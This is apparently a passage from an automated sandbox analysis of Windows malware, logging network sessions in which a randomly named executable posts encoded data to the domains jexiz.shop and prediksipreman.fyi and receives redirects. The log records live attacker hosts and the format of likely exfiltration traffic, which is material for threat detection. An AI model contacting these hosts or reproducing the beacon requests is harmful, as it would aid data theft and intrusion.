1Zgl=hkWRsVxeFftspcoWfpm/HMrsXDAeN2LtgPWZ+dIVKe+YNJopzJcemq1ZYKzUvwaO2CTDu0ajNmtq3L3VmGvptOczT5ewQ60PaQEOd+c7RYe/SCyR8xXOg2Fj1BnqMe9UQJmmG8fpY+2JXikMnussQAriRK0OZlstIFixOCwGsQQRf/GsE3mOYkwMXbW2sJgesYJhkcU=
Oct 31, 2024 10:25:59.514276981 CET	417	IN	HTTP/1.1 301 Moved Permanently Location: https://www.jexiz.shop/li8d/ Content-Type: text/html; charset=utf-8 Date: Thu, 31 Oct 2024 09:25:59 GMT Connection: close Content-Length: 226 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>
Oct 31, 2024 10:26:00.566485882 CET	417	IN	HTTP/1.1 301 Moved Permanently Location: https://www.jexiz.shop/li8d/ Content-Type: text/html; charset=utf-8 Date: Thu, 31 Oct 2024 09:25:59 GMT Connection: close Content-Length: 226 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>
Oct 31, 2024 10:26:00.567255974 CET	417	IN	HTTP/1.1 301 Moved Permanently Location: https://www.jexiz.shop/li8d/ Content-Type: text/html; charset=utf-8 Date: Thu, 31 Oct 2024 09:25:59 GMT Connection: close Content-Length: 226 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49969	8.210.3.99	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:01.129481077 CET	730	OUT	POST /li8d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.jexiz.shop Origin: http://www.jexiz.shop Referer: http://www.jexiz.shop/li8d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 68 6b 57 52 73 56 78 65 46 66 74 73 6f 39 34 57 64 4b 2b 2f 57 63 72 72 4c 7a 41 65 43 57 4c 70 67 50 61 5a 2b 66 6b 46 4b 74 61 59 4e 6f 59 70 79 4c 6b 65 6e 71 31 5a 54 71 7a 56 6c 51 61 46 32 43 66 68 75 30 32 6a 4e 6d 35 71 33 4f 54 56 6d 33 76 6d 73 65 63 78 61 5a 65 79 4e 4b 30 50 61 51 45 4f 64 2b 59 52 52 63 36 2f 53 52 71 52 39 51 58 4e 6a 32 46 67 38 68 6e 71 48 2b 39 51 51 4a 6d 55 47 39 44 48 59 38 2b 4a 58 6a 55 4d 6b 38 49 74 61 41 72 6b 63 71 30 66 66 6e 6c 63 52 47 65 2b 53 52 55 46 7a 79 67 37 61 4a 33 47 65 56 75 6d 4c 45 63 30 48 49 65 42 39 35 42 33 32 37 5a 52 36 4c 43 5a 70 49 6d 6f 34 64 4b 6f 41 48 62 6f 66 52 75 6f 47 65 72 6b Data Ascii: 1Zgl=hkWRsVxeFftso94WdK+/WcrrLzAeCWLpgPaZ+fkFKtaYNoYpyLkenq1ZTqzVlQaF2Cfhu02jNm5q3OTVm3vmsecxaZeyNK0PaQEOd+YRRc6/SRqR9QXNj2Fg8hnqH+9QQJmUG9DHY8+JXjUMk8ItaArkcq0ffnlcRGe+SRUFzyg7aJ3GeVumLEc0HIeB95B327ZR6LCZpImo4dKoAHbofRuoGerk
Oct 31, 2024 10:26:02.075104952 CET	417	IN	HTTP/1.1 301 Moved Permanently Location: https://www.jexiz.shop/li8d/ Content-Type: text/html; charset=utf-8 Date: Thu, 31 Oct 2024 09:26:01 GMT Connection: close Content-Length: 226 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49983	8.210.3.99	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:03.675971985 CET	1747	OUT	POST /li8d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.jexiz.shop Origin: http://www.jexiz.shop Referer: http://www.jexiz.shop/li8d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 68 6b 57 52 73 56 78 65 46 66 74 73 6f 39 34 57 64 4b 2b 2f 57 63 72 72 4c 7a 41 65 43 57 4c 70 67 50 61 5a 2b 66 6b 46 4b 74 53 59 4d 61 51 70 30 73 49 65 6b 71 31 5a 50 61 7a 59 6c 51 61 59 32 43 58 6c 75 30 71 73 4e 6c 42 71 33 6f 50 56 67 44 44 6d 69 75 63 78 58 35 65 78 51 36 30 61 61 55 67 43 64 2b 49 52 52 63 36 2f 53 51 61 52 74 78 58 4e 6c 32 46 6a 31 42 6e 59 4d 65 39 34 51 4a 75 2b 47 38 33 35 59 4e 65 4a 58 41 73 4d 72 75 51 74 57 41 72 6d 62 71 31 43 66 6e 35 48 52 47 43 45 53 51 68 75 7a 77 41 37 59 50 37 64 47 51 4f 69 64 55 4d 41 53 66 6d 54 71 4d 4d 62 32 49 78 6a 6c 4b 4f 43 73 34 36 7a 32 70 4b 51 4b 48 4b 63 4a 58 69 39 4d 6f 61 34 2b 59 46 59 77 4f 54 6d 47 48 65 38 56 6b 36 38 52 49 69 48 50 6d 62 34 41 31 54 36 46 63 6b 35 42 6d 64 33 36 33 47 65 54 50 33 50 2f 7a 4d 66 4e 64 68 6e 6e 47 36 45 55 43 32 4d 33 77 46 47 75 7a 6f 5a 47 43 78 73 4e 36 69 6a 46 79 44 4f 77 70 67 70 66 79 75 68 55 6d 58 76 62 32 51 32 47 4f 6d 37 74 57 7a 78 66 6a 44 35 79 62 64 6b 54 [TRUNCATED] Data Ascii: 1Zgl=hkWRsVxeFftso94WdK+/WcrrLzAeCWLpgPaZ+fkFKtSYMaQp0sIekq1ZPazYlQaY2CXlu0qsNlBq3oPVgDDmiucxX5exQ60aaUgCd+IRRc6/SQaRtxXNl2Fj1BnYMe94QJu+G835YNeJXAsMruQtWArmbq1Cfn5HRGCESQhuzwA7YP7dGQOidUMASfmTqMMb2IxjlKOCs46z2pKQKHKcJXi9Moa4+YFYwOTmGHe8Vk68RIiHPmb4A1T6Fck5Bmd363GeTP3P/zMfNdhnnG6EUC2M3wFGuzoZGCxsN6ijFyDOwpgpfyuhUmXvb2Q2GOm7tWzxfjD5ybdkTIEmV2rLjc9jxnQF05mM4/TO7OpBWqVMdB382k4gW8NkAbK640g+uqGHJvC+O3vm5UCYBPYRBSXtOCPh0e34/9Nne5RYNt1ObmopcyENvB/8xcpiXLl1sG3cKnCCdNJMfX7URq5iD9XSID6hbnjv4wXj3ucO/HAcnB8ptTeEc3gcHp00py/dPCW6EXBXC7/ZaAZu6hmYV5XDbX48AH+2Up7CqxfkaP2RJYvjbYkBqc0QzCZWm+53Lm81ilnLm8/z1LGMcl25mADlM3B5VZwOkVKvXADGAmCrCE1vx2ZetfAFM6UVHRlO7kFBfA1y2urZD2/7L7HZRUPw4TIqIlQl4gAIek9DiYVT31wudCi0QBMTngIT5wX4FJEMhi3kyexpmNzt+kA406RnV5tx2WjYHjhD4n4l/QXUokQz9aq/EU5xaS/N0o8WvaxDYZOx89X7tmQYjVN4i3sCeECWwwjqWSh3Fn7F+WSdwgMZ1QXgrUiYBXCU179G3GKKn46uiLuwv74h6EBQ7GrBS70tdTHgnx6SCLvfD6ZBSlNm1fmTAtN0bIZ8eobgV7kSmhdrR81R48AUss/KE1rqfN9hlAz7ITNcMCicQVFZzLdS6uxgc//krrvDRnZ7LgtjszTAcvKRnBFjjQhz7y6rwuE0aEzjqkdG9Px1tb1S3a+ [TRUNCATED]
Oct 31, 2024 10:26:04.649116039 CET	417	IN	HTTP/1.1 301 Moved Permanently Location: https://www.jexiz.shop/li8d/ Content-Type: text/html; charset=utf-8 Date: Thu, 31 Oct 2024 09:26:04 GMT Connection: close Content-Length: 226 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49990	8.210.3.99	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:06.224742889 CET	455	OUT	GET /li8d/?1Zgl=sm+xvlFNJ8Jn1MAvBLHfFbmpWDRmMBXnhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbroocsQ5/sNLlweHoyZNleSM2rCzfY5hv0qSgJrhCITOEEHg==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.jexiz.shop User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:26:07.175349951 CET	715	IN	HTTP/1.1 301 Moved Permanently Location: https://www.jexiz.shop/li8d/?1Zgl=sm+xvlFNJ8Jn1MAvBLHfFbmpWDRmMBXnhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbroocsQ5/sNLlweHoyZNleSM2rCzfY5hv0qSgJrhCITOEEHg==&w6=2vdPP Content-Type: text/html; charset=utf-8 Date: Thu, 31 Oct 2024 09:26:07 GMT Connection: close Content-Length: 377 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 3f 31 5a 67 6c 3d 73 6d 2b 78 76 6c 46 4e 4a 38 4a 6e 31 4d 41 76 42 4c 48 66 46 62 6d 70 57 44 52 6d 4d 42 58 6e 68 59 75 44 74 4e 34 51 44 75 75 6f 4f 49 51 37 32 49 42 52 37 76 74 58 53 72 50 30 69 6d 54 38 75 51 44 2b 69 30 32 34 4a 79 30 35 67 4a 76 72 73 6d 62 72 6f 6f 63 73 51 35 2f 73 4e 4c 6c 77 65 48 6f 79 5a 4e 6c 65 53 4d 32 72 43 7a 66 59 35 68 76 30 71 53 67 4a 72 68 43 49 54 4f 45 45 48 67 3d 3d 26 61 6d 70 3b 77 36 3d 32 76 64 50 50 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 [TRUNCATED] Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/?1Zgl=sm+xvlFNJ8Jn1MAvBLHfFbmpWDRmMBXnhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbroocsQ5/sNLlweHoyZNleSM2rCzfY5hv0qSgJrhCITOEEHg==&w6=2vdPP'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49991	162.0.215.244	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:12.719130039 CET	734	OUT	POST /3lre/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.prediksipreman.fyi Origin: http://www.prediksipreman.fyi Referer: http://www.prediksipreman.fyi/3lre/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 79 34 39 39 71 4c 68 48 69 56 4a 6f 64 56 62 4a 4a 48 73 59 6d 38 32 68 34 55 41 51 6d 4f 79 46 33 77 2f 33 70 72 44 79 49 57 51 33 2f 70 7a 54 50 38 58 5a 68 35 68 38 31 33 5a 77 31 51 47 39 52 66 73 36 71 75 44 2f 74 71 33 6a 53 49 41 45 6f 71 4f 42 48 58 5a 4c 62 58 34 4f 73 62 5a 72 75 58 62 50 66 7a 62 56 47 32 45 68 51 43 2b 6e 4f 70 6a 72 53 50 6b 47 6f 59 39 69 6c 69 61 48 42 42 39 6f 35 35 55 74 70 4a 63 58 6b 50 66 50 48 4e 67 50 63 67 62 47 33 4f 50 73 38 70 46 50 50 50 54 44 6e 68 58 33 6d 2f 74 47 6d 64 70 66 6b 4e 6d 52 2b 42 6a 34 43 45 4d 72 6a 4f 69 54 57 77 64 42 4a 49 30 3d Data Ascii: 1Zgl=y499qLhHiVJodVbJJHsYm82h4UAQmOyF3w/3prDyIWQ3/pzTP8XZh5h813Zw1QG9Rfs6quD/tq3jSIAEoqOBHXZLbX4OsbZruXbPfzbVG2EhQC+nOpjrSPkGoY9iliaHBB9o55UtpJcXkPfPHNgPcgbG3OPs8pFPPPTDnhX3m/tGmdpfkNmR+Bj4CEMrjOiTWwdBJI0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49992	162.0.215.244	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:15.315876007 CET	754	OUT	POST /3lre/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.prediksipreman.fyi Origin: http://www.prediksipreman.fyi Referer: http://www.prediksipreman.fyi/3lre/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 79 34 39 39 71 4c 68 48 69 56 4a 6f 53 57 54 4a 53 6b 45 59 32 73 32 67 33 30 41 51 73 75 79 42 33 77 7a 33 70 76 54 69 4a 67 49 33 6d 49 6a 54 64 4a 72 5a 67 35 68 38 36 58 5a 78 36 77 47 71 52 66 6f 79 71 75 50 2f 74 71 4c 6a 53 4e 38 45 6f 5a 6d 47 57 58 5a 46 53 33 34 41 6f 62 5a 72 75 58 62 50 66 79 2f 76 47 79 51 68 58 7a 4f 6e 50 4e 58 6f 62 76 6b 42 76 59 39 69 68 69 62 76 42 42 38 4e 35 39 55 48 70 4c 55 58 6b 4f 76 50 48 63 67 4d 56 67 62 45 36 75 4f 41 34 6f 55 4b 4b 70 6a 58 71 48 69 6c 7a 64 64 56 71 4c 59 31 2b 76 75 35 74 68 50 41 53 58 45 63 79 2b 44 36 4d 54 4e 78 58 66 6a 34 6a 61 2b 59 4b 33 4c 49 65 52 4a 30 4c 78 66 7a 2f 53 74 79 Data Ascii: 1Zgl=y499qLhHiVJoSWTJSkEY2s2g30AQsuyB3wz3pvTiJgI3mIjTdJrZg5h86XZx6wGqRfoyquP/tqLjSN8EoZmGWXZFS34AobZruXbPfy/vGyQhXzOnPNXobvkBvY9ihibvBB8N59UHpLUXkOvPHcgMVgbE6uOA4oUKKpjXqHilzddVqLY1+vu5thPASXEcy+D6MTNxXfj4ja+YK3LIeRJ0Lxfz/Sty

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49993	162.0.215.244	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:17.882667065 CET	1771	OUT	POST /3lre/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.prediksipreman.fyi Origin: http://www.prediksipreman.fyi Referer: http://www.prediksipreman.fyi/3lre/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 79 34 39 39 71 4c 68 48 69 56 4a 6f 53 57 54 4a 53 6b 45 59 32 73 32 67 33 30 41 51 73 75 79 42 33 77 7a 33 70 76 54 69 4a 67 41 33 36 71 37 54 4d 61 44 5a 6e 35 68 38 33 33 5a 30 36 77 48 6f 52 66 51 32 71 75 54 77 74 73 48 6a 52 6f 77 45 71 6f 6d 47 66 58 5a 46 66 58 34 4e 73 62 59 6a 75 55 6a 55 66 7a 50 76 47 79 51 68 58 78 57 6e 66 70 6a 6f 64 76 6b 47 6f 59 39 75 6c 69 62 55 42 42 30 37 35 39 59 39 6f 36 30 58 6c 75 2f 50 43 75 49 4d 61 67 62 43 39 75 4f 59 34 6f 59 42 4b 70 58 68 71 44 6a 77 7a 66 39 56 70 71 70 73 6e 63 6e 69 35 79 72 68 66 32 6c 36 77 75 7a 47 54 43 78 65 63 39 62 31 75 37 61 4e 48 6a 37 38 61 51 6f 7a 4b 6c 6d 70 39 32 38 52 4e 36 38 62 55 54 30 46 4f 2f 57 56 49 32 61 31 75 71 6c 4d 70 70 6a 56 35 34 5a 47 72 42 37 63 4d 39 57 36 72 31 39 4f 33 79 6d 71 62 45 41 45 4b 4b 4d 31 35 2f 56 56 78 6b 2f 65 33 6c 61 59 2b 33 41 66 41 50 51 37 6e 7a 4b 33 51 37 69 4e 64 6c 39 76 5a 45 43 2f 32 45 76 6f 36 70 2b 4d 31 38 35 5a 48 63 5a 35 39 55 77 49 7a 30 58 4c 77 [TRUNCATED] Data Ascii: 1Zgl=y499qLhHiVJoSWTJSkEY2s2g30AQsuyB3wz3pvTiJgA36q7TMaDZn5h833Z06wHoRfQ2quTwtsHjRowEqomGfXZFfX4NsbYjuUjUfzPvGyQhXxWnfpjodvkGoY9ulibUBB0759Y9o60Xlu/PCuIMagbC9uOY4oYBKpXhqDjwzf9Vpqpsncni5yrhf2l6wuzGTCxec9b1u7aNHj78aQozKlmp928RN68bUT0FO/WVI2a1uqlMppjV54ZGrB7cM9W6r19O3ymqbEAEKKM15/VVxk/e3laY+3AfAPQ7nzK3Q7iNdl9vZEC/2Evo6p+M185ZHcZ59UwIz0XLwCNVtpQaHKSD590RXGNnYtJ0B9U6qiySTtphWKjxb1blCRcBDfWNJJ6g41yB4Y+eG8r1ftDdPziAH5Dw3QX8oIqGG8KOoAi6qM9COXBQQxwnMa5UPh5DUHerwFd5Zb4Ya4qv0Kl73TgZ9bQFNFpTIR5LP/cr20BtzurtsANK0momc5hSsLFdnEzcSQ/snbM00oQHPTN1f3Fwlk4rzGOXHiEe6KkuIOLlu2hfKkK5Y/qwoy2HOckwHcNDYclOx14LS6R/tJ8fetZgvkEo2ypcf0IifrKEOfzHkzATIO6n6kg/MuLW/2kMYZvLsAcHPa3XL6QXzijWqOqTI8TsuWgf7+YeYA56uGIBClndsFkb7hXZa2cHBHf4Hlt1OSMf//2iifHyRbE9smi66K0GahCWZk3jgcEd2fB7bOz6eZaqHR43xZbb8EP+m5qESPG04WRqxNpjqf0BwZHgBFSm9xN9xIhMiKRZCJ7Y05+s4uUkO88MjlQPAW411+hmv1kjZExdjgQz13d+E0QbhOBQLcydy/F/YxrQHUNzwQeNu4RXqkYVWFkfIsKpKRdJmFV8SFELNqYZZ0NUVwyRRr6UiO72cqjpjxANeFPgfw0Xs4AtsWOwJtu1fDGxBSXcu+OikZOC6x/csCbJi74TBPG+ns/dgN0jEswS8frIiMl [TRUNCATED]
Oct 31, 2024 10:26:19.271138906 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Thu, 31 Oct 2024 09:26:19 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 a4 de ee d9 d5 0d 49 80 84 24 10 20 1c 8e 13 42 77 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f dc 82 5d 99 2a 3f 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 39 df 7e bb fc 4c dc ca 02 33 aa fc de 3d d6 61 f3 74 c7 66 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 ab 28 dd ea a9 ae bc 7b f2 ee 53 3a 96 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 2d 2c 3f b1 fe 91 15 7c 97 87 85 5b 5e 2d 41 de 51 4f ad c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a b4 e2 fb d2 b6 62 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 92 55 83 49 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 f5 3e 73 4e 83 bf 5f a6 f6 9f 7d f3 80 74 ee 3d 2b 09 e3 d3 c3 80 2e c0 b6 5f 06 a2 1b 37 6e 15 da d6 97 41 69 a5 e5 7d e9 16 a1 f7 97 1f 97 95 e1 d9 7d 18 a0 44 de bd [TRUNCATED] Data Ascii: 1351ZJrnhztI$ BwtEw5d.4}f.YY_fdoO]?$hk9~L3=atfi}utW]$2({S:"}P-,?\|[^-AQO}kBN<9n LbTV@UIV#,:\|>sN_}t=+._7nAi}}D0%0eG~(?{~61y?[??LuwK,Unq#',l$r3)YuexogN 2S/9\K{jyYYU]8j?DkYzlxg"Sw{f"!=z`@\Wh-yFgj~Ny~}XIyC;0L)LL?>nxUU<=KzJWYa{z?b+m\|C5nql<x][4Fj}_cg/a\|*C7{Erw8az~8mpCp7_ot 